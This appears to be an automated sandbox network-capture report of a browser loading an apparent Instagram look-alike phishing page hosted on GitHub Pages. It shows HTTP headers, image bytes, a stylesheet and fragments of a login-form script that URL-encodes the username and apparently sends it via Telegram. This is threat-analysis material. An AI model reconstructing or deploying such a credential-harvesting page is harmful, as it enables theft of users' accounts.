                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC768INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 3212
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  x-origin-cache: HIT
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-c8c"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: 2C5C:140E5B:2C4849A:318CE8C:66F8DD2D
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:02 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740065-EWR
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585582.360229,VS0,VE14
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: 54ec5b8c99c3746ea824eb82d95776738e08abdf
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1378INData Raw: 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 65 6c 65 67 72 61 6d 46 6f 72 6d 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 6c 6f 61 64 69 6e 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 61 64 69 6e 67 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 76 61 6c 69 64 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 69 6e 76 61 6c 69 64 22 29 20 0d 0a 20 20 20 20 6c 65 74 20 74 72 79 43 6f 75 6e 74 20 3d 20 30 3b 20 2f 2f 20
                                                                                                                                                                                                                                  Data Ascii: document.addEventListener('DOMContentLoaded', () => { const form = document.getElementById('telegramForm'); const loading = document.getElementById('loading'); const validText = document.querySelector(".invalid") let tryCount = 0; //
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1378INData Raw: b4 d0 b5 d1 80 d0 b6 d0 ba d0 b0 20 d0 bf d0 b5 d1 80 d0 b5 d0 b4 20 d0 be d1 82 d0 bf d1 80 d0 b0 d0 b2 d0 ba d0 be d0 b9 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 49 6e 74 65 72 76 61 6c 28 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 66 6c 65 78 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 35 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6e 63 6f 64 65 64 55 73 65 72 6e 61 6d 65 20 3d 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 29 3b 0d 0a 20 20 20 20
                                                                                                                                                                                                                                  Data Ascii: setInterval(() => { loading.style.display = 'flex'; }, 500); const encodedUsername = encodeURIComponent(username.value);
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC456INData Raw: 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 28 65 72 72 6f 72 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 65 72 74 28 22 45 72 72 6f 72 21 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 3a 20 22 20 2b 20 65 72 72 6f 72 2e 6d 65 73 73 61 67 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 72 72 6f 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72
                                                                                                                                                                                                                                  Data Ascii: }) .catch((error) => { alert("Error! Please try again: " + error.message); console.log(error); loading.style.display = 'none'; user


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  4192.168.2.649718185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC634OUTGET /instagram.com/img//instagram-logo.png HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 3841
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  x-origin-cache: HIT
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-f01"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: AD25:1EEB85:2E07C1E:334C753:66F8DD2E
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:02 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740078-EWR
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585582.361930,VS0,VE18
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: b9536e80854dba652b0538375c6c88f75c900f85
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ce 00 00 00 3a 08 03 00 00 00 cf c2 96 f9 00 00 02 fd 50 4c 54 45 00 00 00 23 1f 20 23 1f 20 ff ff ff 23 20 20 24 1f 24 23 1f 20 27 21 21 40 20 40 23 20 20 24 24 24 24 20 21 23 1f 20 28 22 22 23 1f 20 2b 2b 2b 24 24 24 25 21 21 55 55 55 23 20 21 80 80 80 27 21 21 24 1f 21 24 20 21 25 1f 25 24 1f 20 2e 2e 2e 23 20 23 23 20 21 2e 23 23 23 20 21 29 23 23 40 40 40 28 22 22 23 20 22 25 20 25 26 21 21 24 20 21 23 20 23 24 21 21 29 29 29 24 20 20 23 20 21 25 1f 21 33 33 33 25 22 22 24 20 24 23 20 21 24 1f 21 24 20 21 24 20 21 24 20 20 26 22 22 39 39 39 26 26 26 25 20 22 23 1f 20 27 27 27 26 21 21 28 28 28 23 1f 21 24 20 21 24 24 24 25 1f 22 23 20 22 24 20 20 24 1f 21 23 23 23 23 20 21 24 20 20 24 1f 21 25
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR:PLTE# # # $$# '!!@ @# $$$$ !# (""# +++$$$%!!UUU# !'!!$!$ !%%$ ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%!333%""$ $# !$!$ !$ !$ &""999&&&% "# '''&!!(((#!$ !$$$%"# "$ $!#### !$ $!%
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1378INData Raw: dd 3b 7d dd fa 36 d3 06 53 bc b3 72 c4 8d 1d 7b e6 27 c3 12 0a e0 82 02 2d a1 8c 8e dd c6 7c 83 0b c9 3e 82 f2 bb 85 24 75 4a 8f 9a 74 1a f6 ba 2e 0d b6 c2 cd b5 9f 2d 80 47 74 ed 18 16 5f 02 d7 76 8a 95 30 fe 54 7f 80 2f d8 f8 64 36 92 d2 26 c2 23 30 e2 8b 18 8e db 9f 0c 1c 8b 0e 78 a7 b3 15 fe 57 ec e6 f7 23 fd 03 ba 65 01 eb a6 27 c0 f6 e9 e3 ad 92 21 56 75 7a f2 23 58 5e be ed d9 34 18 6b 49 06 21 ae 36 e9 7c 4b f2 86 0c 88 c3 11 24 83 cd b3 e1 58 14 43 92 e1 c7 e0 78 9b 22 13 ae 5d c3 a9 2e 0b bd 48 f6 bf cb 5d 8f 8c cb a8 82 2d 76 f9 19 f1 e3 2a 00 98 75 e1 96 62 7a 3d aa ae c9 cf 93 51 8b 5b 43 f5 26 d9 2e 09 a8 96 22 7f fb 68 00 48 8b 24 b9 e6 35 38 64 70 45 10 cd 4d 65 1b ec 96 ec b1 7e aa 5f 9c 41 75 88 a2 32 cd d0 17 14 3b e0 88 8f a2 ed 89 66
                                                                                                                                                                                                                                  Data Ascii: ;}6Sr{'-|>$uJt.-Gt_v0T/d6&#0xW#e'!Vuz#X^4kI!6|K$XCx"].H]-v*ubz=Q[C&."hH$58dpEMe~_Au2;f
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1085INData Raw: 21 f7 51 3d 67 cf d9 67 10 13 d7 c3 a8 41 a1 c3 ed 4f b3 22 18 4b 31 0d c0 87 e4 9b f0 d6 da 3c 64 b2 49 6d 8a a1 9e 29 d9 e8 6d 78 b8 cf bc 6b 46 c1 33 ae ba 81 03 7a af 79 ce ce 7c 09 3b 9a 71 00 87 28 ea 9b cf ad f6 7a 3e 4d 95 05 24 9b d3 ba 66 67 99 74 b2 dc 02 cb 26 50 23 28 5a 00 ad 63 b8 a7 01 6c 8d b4 13 f9 24 82 3d 7a 98 d4 0b a2 28 22 63 01 33 85 9f 9a 7d 7f 9d f7 cb 5c dd 1e 9e 2f db 13 cc d6 18 4f b1 0b aa be a7 c9 39 e5 d9 33 9f 51 24 02 c8 90 e0 9c de bf be 62 18 2f 50 fc ec 5e e1 3c 05 73 4a f9 0c 12 6e 71 a6 d7 ed 13 13 fb 73 6d 28 97 e2 0d ab 9a 2c a7 78 19 62 96 bb bf 81 7c 8a 07 bd 4f 8a 2b a3 b8 ad 00 b6 a4 08 b7 bd ab 45 f7 46 c5 91 66 e6 a5 96 11 41 d3 2f fc 40 d1 ce b9 24 7b 27 e9 21 df 03 63 8c 16 97 24 b3 3a 03 a1 be a4 78 37 f6
                                                                                                                                                                                                                                  Data Ascii: !Q=ggAO"K1<dIm)mxkF3zy|;q(z>M$fgt&P#(Zcl$=z("c3}\/O93Q$b/P^<sJnqsm(,xb|O+EFfA/@${'!c$:x7


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  5192.168.2.649721185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC631OUTGET /instagram.com/img/apple-button.png HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 3754
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  x-origin-cache: HIT
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-eaa"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: 2B52:16F5:110D28E:13927BD:66F8DD2D
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:02 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740045-EWR
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585582.362112,VS0,VE11
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: 19477de9cc82ac416d35f1d5fd03d425bdbc21d0
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 32 00 00 00 5a 08 03 00 00 00 0c c8 2a 74 00 00 01 8c 50 4c 54 45 00 00 00 a6 a6 a6 a6 a6 a6 a5 a5 a5 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a5 a5 a5 a4 a4 a4 a4 a4 a4 a4 a4 a4 a6 a6 a6 a5 a5 a5 a6 a6 a6 a7 a7 a7 a7 a7 a7 a6 a6 a6 a0 a0 a0 63 63 63 2e 2e 2e 0f 0f 0f 00 00 00 02 02 02 12 12 12 37 37 37 6d 6d 6d a6 a6 a6 a5 a5 a5 a5 a5 a5 72 72 72 1d 1d 1d 83 83 83 5c 5c 5c 05 05 05 89 89 89 a6 a6 a6 29 29 29 80 80 80 4b 4b 4b 1f 1f 1f 32 32 32 90 90 90 d6 d6 d6 fb fb fb 40 40 40 0c 0c 0c 17 17 17 24 24 24 c0 c0 c0 ff ff ff 62 62 62 9e 9e 9e 9c 9c 9c 8c 8c 8c 6b 6b 6b 30 30 30 60 60 60 df df df 86 86 86 fd fd fd 46 46 46 b3 b3 b3 d3 d3 d3 a3 a3 a3 5b 5b 5b 50 50 50 68 68 68 f7 f7 f7 bf bf bf ad ad ad 93
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR2Z*tPLTEccc...777mmmrrr\\\)))KKK222@@@$$$bbbkkk000```FFF[[[PPPhhh
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1378INData Raw: 9b 67 12 aa 4b 26 c7 79 0b 48 64 87 fe 96 da 01 74 b0 e1 81 b3 18 a7 32 c0 a3 ca c9 1e f4 b5 30 05 cc 32 7d 99 92 df d2 a1 65 ef 84 f0 a6 38 d9 07 08 fd e4 8c b5 64 8d 5a b2 6b ae 38 34 e1 9f 91 ac 91 dc ea 4a 01 55 26 73 90 4d 00 ce 73 4d 9c e4 2a 80 56 de b5 b1 13 3e 3a 7a 39 57 21 d9 37 7d 63 9a 64 42 42 8c 7c 03 e0 20 9b 4c de 64 0f 84 0e 53 32 31 d2 00 21 49 2a d5 24 9b e4 a7 9f 78 5c b6 f8 7d 49 af d1 7c e3 b1 9a cc 36 94 5b 89 d1 45 f7 03 20 dd 32 ad 02 90 4e 79 ed b6 c1 ce 8f a3 13 a8 90 4c 7a cb 5d 19 b8 09 70 10 78 20 d7 81 6e 66 93 e1 90 1b 37 40 2c 6e 4e 16 64 68 11 90 3f 32 2e 57 48 f6 89 d7 e5 c9 d6 c9 d5 97 4c 66 fb dc 70 1e e0 c6 ca d0 7b 18 d4 e4 e4 01 85 d0 ee d0 c2 73 c9 6e 7b a2 c7 9b a4 d7 06 21 76 c0 d3 48 f8 07 d9 69 6c b2 c7 5a 22
                                                                                                                                                                                                                                  Data Ascii: gK&yHdt202}e8dZk84JU&sMsM*V>:z9W!7}cdBB| LdS21!I*$x\}I|6[E 2NyLz]px nf7@,nNdh?2.WHLfp{sn{!vHilZ"
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC998INData Raw: 61 97 e4 44 4d c9 3c 21 5a d6 fa d4 69 b7 74 63 8e 97 42 d4 9c ec 10 79 cb 14 3a 8c 77 35 5e f2 3f 37 82 32 2d 8e 00 b3 d6 cc c9 cc 99 c3 25 5f 19 96 8d 8d fe e4 89 93 f5 07 35 25 c3 00 ad ba b5 be 20 a6 a5 c7 93 f9 28 04 8d 64 a6 81 cf 46 e8 32 37 bd 14 42 9e f2 64 5e f3 0b a1 c3 98 5c a1 30 09 dd 0c cb c4 6b 4b d6 ef a6 45 ab 55 ec 76 ef 9f 48 d6 53 55 32 d8 33 14 3a cb 93 bd 2b 49 e6 30 26 57 28 34 3e 71 05 c5 de df 74 19 cb 75 35 bb 90 60 79 32 d3 e7 af 3c d9 19 85 ae 27 4e d0 76 94 27 9b a5 30 5d f2 c5 b4 a3 2c 59 1b 85 33 c5 6c b8 c6 64 9e 0c ad d8 5f 40 05 2e 0a b7 4b 86 30 85 b8 54 48 76 82 bc 2f 45 2b f4 31 f2 7e a3 30 83 47 85 29 f4 94 27 d3 12 6d 23 ef 96 82 bf 2c 59 d2 ea 49 52 eb c9 30 43 2b 7a 9e 3e b9 15 81 41 ce 50 f8 5a 48 76 57 18 4a 53
                                                                                                                                                                                                                                  Data Ascii: aDM<!ZitcBy:w5^?72-%_5% (dF27Bd^\0kKEUvHSU23:+I0&W(4>qtu5`y2<'Nv'0],Y3ld_@.K0THv/E+1~0G)'m#,YIR0C+z>APZHvWJS


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  6192.168.2.649720104.17.25.144431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC576OUTGET /ajax/libs/font-awesome/6.5.2/css/all.min.css HTTP/1.1
                                                                                                                                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://sayidanur.github.io
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC920INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:02 GMT
                                                                                                                                                                                                                                  Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                  ETag: W/"660cc074-5556"
                                                                                                                                                                                                                                  Last-Modified: Wed, 03 Apr 2024 02:35:32 GMT
                                                                                                                                                                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                  Age: 817909
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 04:53:02 GMT
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyW2imgNa1TAvsmElFBqDo6TDy9xFlUu9fF6BCL0cAJMVKNk0SPB7Y0KqC84uVjY%2FLHctv%2FfXrCPzVMYRG%2F8oz3ZHu4sQUU%2BiX5q14xTHQoD%2FUxwamLVU0DVlSG20a%2B6LzvvLaoh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8ca95e01fbc38c75-EWR
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC449INData Raw: 33 39 38 37 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 35 2e 32 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                                                                                                                                                                                  Data Ascii: 3987/*! * Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2024 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 63 6c 61 73 73 69 63 2c 2e 66 61 2d 72 65 67 75 6c 61 72 2c 2e 66 61 2d 73 6f 6c 69 64 2c 2e 66 61 72 2c 2e 66 61 73 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 46 72 65 65 22 7d 2e 66 61 2d 62 72 61 6e 64 73 2c 2e 66 61 62 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 42 72 61 6e 64 73 22 7d 2e 66
                                                                                                                                                                                                                                  Data Ascii: antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.f
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 72 69 67 68 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 70 75 6c 6c 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79
                                                                                                                                                                                                                                  Data Ascii: right:var(--fa-pull-margin,.3em)}.fa-pull-right{float:right;margin-left:var(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0s);animation-delay:var(--fa-animation-delay
